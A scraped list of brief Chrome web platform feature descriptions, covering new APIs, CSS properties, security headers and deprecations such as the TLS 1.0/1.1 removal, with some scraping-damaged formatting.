HTML’s registerProtocolHandler() gives a webpage a mechanism to register itself to handle a protocol after a user consents. For example, a web-based email application could register to handle the mailto: scheme. A corresponding unregisterProtocolHandler() API allows a site to abandon its protocol-handling registration.
This experiment will allow participating sites to provide hints to cache_storage that full code cache should not be generated in a service worker install event. The hint will be communicated as a header on the Response being stored.
This is a change to an unspecified optimization in chrome. Full code cache generation during the install event was added in M64. It is only observable indirectly through changes in timing and disk quota usage.
Extends the Contacts API (https://www.chromestatus.com/feature/6511327140904960) to support requesting addresses/icons as well.
The ‘submit’ event, which is dispatched on form submission, gets its own interface, SubmitEvent, which has a ‘submitter’ property.
Adds properties controlling margin collapsing: -webkit-margin-top-collapse, -webkit-margin-before-collapse, -webkit-margin-before-collapse, and -webkit-margin-after-collapse. These properties have two values:
“separate”: disables margin collapsing by “separating the margins”, e.g. https://www.software.hixie.ch/utilities/js/live-dom-viewer/?saved=7507
(its a lot more complex than this example)
“discard”: ignores all margins:
https://www.software.hixie.ch/utilities/js/live-dom-viewer/?
Allows web apps (as defined by the Web App Manifest standard) to set an app-wide badge in operating-system-specific places such as the shelf or home screen. Additionally, it gives the app a small, visible place to notify the user of new activity that might require attention, without showing a full notification. It can show additional information, such as an unread count or event type. It allows the app to convey this information when its windows are closed.
This feature tracks https://www.chromestatus.com/feature/5118272741572608 for the case of PerformanceLongTask entries
Many operating systems now have a “dark mode” preference. Some browsers already offer an option to transform webpages into a dark theme. The prefers-color-scheme media query is a way for an author to support their own dark theme, so they have full control over their own experience. The meta tag is needed so that a site can explicitly opt-in and say that they fully support a dark theme and that the browser should load a different UA sheet and not ever apply transformations.
Let the author opt-in to follow the preferred color scheme when rendering UI elements such as default colors of form controls and scrollbars as well as the used values of the CSS system colors.
Lets custom element authors use ElementInternals to set a custom element’s default accessibility role, states, and properties, much like the default accessibility semantics for native elements.
A new method will allow applications to query whether a specific encryption scheme is supported by Encrypted Media Extensions (EME).
Allow the IntersectionObserver constructor to take a Document as the ‘root’ argument, causing intersections to be calculated against the scrolling viewport of the document.
Provides a new API to get localized names of language, region, script, currency codes of international standard as well as commonly used names of date fields and symbols.
Currently, the prefixed onwebkit{animation,transition}XX handlers are only available on the Window object in Chrome. By the spec0, these should be on GlobalEventHandlers1 - i.e. available on HTMLElement, Document, and Window.
Note that although standardized, these event handlers are still obsolete - web developers should use the non-prefixed versions instead!
Previously, the rendering tasks (i.e. BeginMainFrame) were always run at default priority on the main thread. This means that rendering could be starved by other normal priority work, for example tons of postMessages (crbug.com/943621). This feature is an internal scheduling change which prevents this from happening by periodically increasing the priority of rendering if we have not rendered in a while. It targets a lower frame-rate of 10 fps.
Adds the ability to request unadjusted/unaccelerated mouse movement data when in PointerLock. If this unadjustedMovement is set to true, then the pointer movements will not be affected by the underlying platform modifications such as mouse acceleration.
Adds support for tracking position state in a media session. The position state is a combination of the playback rate, duration and current playback time. This can then be used by browsers to display position in the UI and with the addition of seeking can support seeking/scrubbing too.
By default, the position state is taken from the media element. However, this does not work in all cases and therefore this provides a setPositionState() method to the site to specify a custom position state.
Replaces hostCandidate with explicit address and port for oncecandidateerror event according to the latest WebRTC 1.0 spec - https://github.com/w3c/webrtc-pc/pull/2322/
Add a close() method to WritableStream objects. This permits closing the stream if it is unlocked. It is directly equivalent to getting a writer, using the writer to close the stream, and then unlocking it again.
Enable the CSS image-orientation feature, currently hidden behind a flag. Change the default value to from-image, and apply the property to all images, both content and style.
In practice this means that the exif orientation, when present in an image, will be used to orient the image unless the “image-orientation: none” CSS property is present.
For a ConvolverNode, the channelCount can now be set to 1 or 2. The channelCountMode can be “explicit” or “clamped-max”. Previously, a channelCount of 1 was not allowed and neither was a mode of “explicit”.
The WebAudio spec has updated the limits for the frequency, detune, and gain AudioParam attributes for a BiquadFilterNode. Previously these allowed any floating-point value.
WebXR AR Module brings Augmented Reality support to WebXR Device API.
The Hit-test API is an extension to the WebXR Device API that provides the capability of raycasting into the real world as understood by the underlying XR system. The goal is to provide a simple API that allows apps to place objects in the real world by casting rays that can be evaluated against the underlying platform’s understanding of the real world geometry, regardless of how that is implemented (e.g., hit test against detected planes, point clouds, meshes, etc.).
Adds the WorkerOptions object as the second argument for a shared worker constructor. The previous second argument, a DOMString containing the worker’s name is still supported.
This attribute defines the ability to for a page author to hint to the user agent’s translation engine that an href should be translated if followed.
Adds the onclosing event, which signals to the user of a data channel that the other side has started closing the channel; the browser user agent will continue reading from the queue (if it contains anything), but no more data can be sent.
Specifying “supportedTypes”:[type] parameter for “basic-card” payment method shows cards of only the requested type, which is one of “credit”, “debit”, or “prepaid”.
<discard>
elementThe <discard>
element is part of the SVG Animations (draft) specification. It provides a way to declaratively remove elements at a specific point in time and be a mechanism for streaming animations.
TLS 1.3 includes a backwards-compatible hardening measure to strengthen downgrade protections. However, when we shipped TLS 1.3 last year, we had to partially disable this measure due to incompatibilities with some non-compliant TLS-terminating proxies. Chrome currently implements the hardening measure for certificates which chain up to known roots, but allows a bypass for certificates chaining up to unknown roots. We intend to enable it for all connections.
When a fill forward animation finishes, it remains in effect. If enough of these animations build up, they can negatively impact performance and leak memory.
There are 3 main parts to this feature:
‘-webkit-appearance’ CSS property will have new ‘auto’ keyword, which indicates the default appearance of the target element.
Tweak web font loading, so that:
Web fonts with ‘font-display: optional’ never cause relayout
Web font preloading is allowed to slightly block rendering (for all font-display values), so that if the font loads fast enough, we don’t need to render with fallback.
Therefore, when ‘font-display: optional’ and preloading are used together, we’ll never see layout shifting from font swapping, and still have a good chance to use the font if it loads fast enough (e.g., from disk cache).
Adds a function that queries whether a user agent supports a selector.
Support the new markup in the ARIA annotations editor’s draft (3 new roles, 1 new property): suggestion, mark, comment, aria-description
This feature enables new semantics:
<mark>
The Barcode Detection API is a subset of the Shape Detection API which provides the ability to detect and decode barcodes in an image provided by script. The image may come from any type of image buffer source such as an <image>
, <video>
or <canvas>
tag.
Some native platforms include built-in libraries for performing text detection and optical character recognition (OCR) in images. The availability of these libraries means that developers do not need to include a large third party library.
The contain-intrinsic-size property allows developers to specify a placeholder size which would be used while contain: size is applied. With contain-intrinsic-size specified, elements lay out as if they had a single child with fixed size (specified by contain-intrinsic-size) unless they have an explicit width/height.
This is helpful when size containment may be dynamically added/removed so that there is a fallback size during size containment but a content-based size during regular sizing.
Add a new HTTP header that prevents documents and workers from loading non-same-origin requests unless explicitly allowed via CORS or CORP.
Combined with Cross-Origin-Opener-Policy (COOP), this feature allows documents (and workers) to use powerful APIs such as SharedArrayBuffer.
The Cross-Origin-Opener-Policy response header provides a way for a document to request a new browsing context group to better isolate itself from other untrustworthy origins. Optionally, browsers can also choose to place top-level documents in a different process from documents without a matching Cross-Origin-Opener-Policy.
JavaScript will support modules in shared workers. Setting ‘module’ type by the constructor’s type attribute, worker scripts are loaded as ES modules and the import statement is available on worker contexts.
HTMLVideoElement.requestVideoFrameCallback() registers a one-shot callback, called when a video frame has been presented for composition. It also provides useful metadata about that frame.
Exposes an optional relaxedDurability parameter on IDBDatabase.transaction to control flushing to disk.
This encoding parameter allows developers to limit the framerate on a video layer before sending.
When encoding video, and some constraint (bandwidth, CPU) prevents encoding at the configured framerate and resolution, the encoder must make a choice on how to modify the encoding parameters.
An attribute is defined for RTCRtpSendParameters that allows this to be explicitly indicated for an RTCRtpSender.
<input type=time>
According to the HTML spec, <input type=time>
, which allows users to input time in hours, minutes, and seconds, should support reversed ranges because it has a defined maximum of “23:59:59”. A reversed range is when the input has a min and max attribute where the max is less than the min, and in this state, the input should allow values which are less than the min or greater than the max, but not in between them.
This has been in the spec for many years but has not been implemented until now.
The CSS Paged Media Module Level 3 spec includes a list of page size names that may be used in the “size” property of the @page rule.
Among these are two names for Japanese Industrial Standard page sizes which are currently not being recognized by Chrome:
“JIS-B5” refers to JIS B5 size (182mm wide by 257mm high)
“JIS-B4” refers to JIS B4 size (257mm wide by 364mm high)
This feature completes the implementation of this section of the standard by adding support for these two page size.
‘Trusted Types’ offers an (optional) mechanism for web sites to protect themselves against XSS (cross-site scripting) attacks.It limits the attack surface from potentially the entire code base to a handful of “policies” that a developer can implement and install, and whose usage the browser will then enforce. “Trusted types” then ensure that all risk-ful parts of the DOM can only be used by data that has gone through such a developer-supplied policy.
Release is expected in Chrome 83.
Allows WebXR applications using immersive-ar on handheld devices to optionally activate a DOM overlay mode where the 2D page content is shown as an interactive transparent layer on top of the application-drawn WebGL content and camera image.
While the current implementation is limited to ARCore-based handheld devices, the specification is intended to also support implementation on AR headsets.
<button>
The ‘display’ keywords ‘inline-grid’, ‘grid’, ‘inline-flex’, and ‘flex’ property will now function with <button>
when align item is applied.
Sandboxed iframe can initiate or instantiate downloads.
Chrome is planning on removing this capability - i.e. Chrome is going to block all downloads initiated from or instantiated in a sandboxed iframe by default. The embedder may add “allow-downloads” to the sandbox attributes list to opt in. This allows content providers to restrict malicious or abusive downloads.
Allows websites to register offline enabled content in the browser. This allows the browser to improve the offline experience and allow content browsing when the user is offline. This data could also be used to improve on-device search and to augment browsing history.
This css property allows you to specify spacing between flex items and/or flex lines.
Weak references enable JavaScript developers to create weak references to JavaScript objects.
Weak references and finalizers help web developers define cleanup routines that don’t keep the related objects alive but are (optionally) executed after the related object is garbage-collected.
Extends the layout instability API with information about specific DOM element(s) that experienced a shift.
Keeping state and behavior private to a class lets library authors present a clear, stable interface, while changing their code over time behind the scenes. The class fields proposal provides private fields for classes and instances, and this proposal builds on that by adding private methods and accessors (getter/setters) to JavaScript. With this proposal, any class element can be private.
Expose ReportingObserver (https://www.chromestatus.com/feature/4691191559880704) to workers.
This has already been specified, but it was exposed only to Window because we didn’t need it on workers.
As we are introducing new reports reported to workers we need to expose it to Worker too.
ResizeObserver is a an existing DOM observer API intended to be used for observing the size of DOM elements. There have been three updates to the spec:
An API that allows web applications to request a screen wake lock. Under the right conditions, and if allowed, the screen wake lock prevents the system from turning off a device’s screen.
This feature introduces ‘appearance’ CSS property, which is the unprefixed version of ‘-webkit-appearance’.
The ‘ruby-position’ CSS property controls the position of ruby annotation. It’s the unprefixed version of the ‘-webkit-ruby-position’ property. This property has three possible keywords: ‘over’, ‘under’, and ‘inter-character’. For now, only the first two are being implemented. This change creates feature parity with Firefox.
Update the web animations JavaScript API to align with the specifications in https://drafts.csswg.org/web-animations-1/.
The Animation interface is extended to include support for promises, replaceable animations, and read-only access to the animation timeline.
The Animatable and DocumentOrShadowRoot interfaces are expanded to support getAnimations.
The KeyframeEffect interface is expanded to support compositing modes, getKeyframes, setKeyframes, and pseudoElement.
Adds support for web authentication calls from cross-origin iframes if enabled by a feature policy. This brings Chrome in line with the Web Authentication level two specification (https://w3c.github.io/webauthn/#sctn-iframe-guidance).
The WebOTP API (formerly called the SMS Receiver API) notifies an application when a specially-crafted SMS message is delivered to the user’s phone. The message must be addressed to the application’s origin. The application only receives an OTP code in the message.
Enhances the Intl.DateTimeFormat API by adding a “ fractionalSecondDigits” option to control the format of fractions of a second.
The ‘revert’ keyword allows authors to roll back the cascade to the previous cascade level for a given CSS property.
For example, on a <div>
element, specifying ‘display:revert’ will cause the computed value of ‘display’ to be ‘block’ (assuming no user styles).
The original spec for constructable stylesheets allowed for calls to sheet.replace(“@import(‘some.css’);”). This use case is being removed - calls to replace() will throw an exception if @import rules are found in the replaced content.
The CSS Working Group resolved to remove this feature on Feb 19, 2020: https://github.com/WICG/construct-stylesheets/issues/119#issuecomment-588352418.
This feature was deprecated in M83, and will be removed in M84.
This removal has been delayed in Stable until Chrome 84.
TLS 1.0 and 1.1 were deprecated in Chrome 72 with a planned removal in Chrome 81 (in early 2020). Other browsers are also removing support for TLS 1.0 and 1.1 at this time. Previously, we showed a deprecation warning in DevTools. In M-79, Chrome marked affected sites as “Not Secure”. In M-84, Chrome will show a full page interstitial warning on sites that do not support TLS 1.2 or higher. In M-98, the error will no longer be bypassable.
Chrome intends to block insecurely-delivered downloads initiated from secure contexts (“mixed content downloads”). Chrome will begin warning on, then blocking, progressively more mixed content downloads until all such downloads are silently blocked.
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。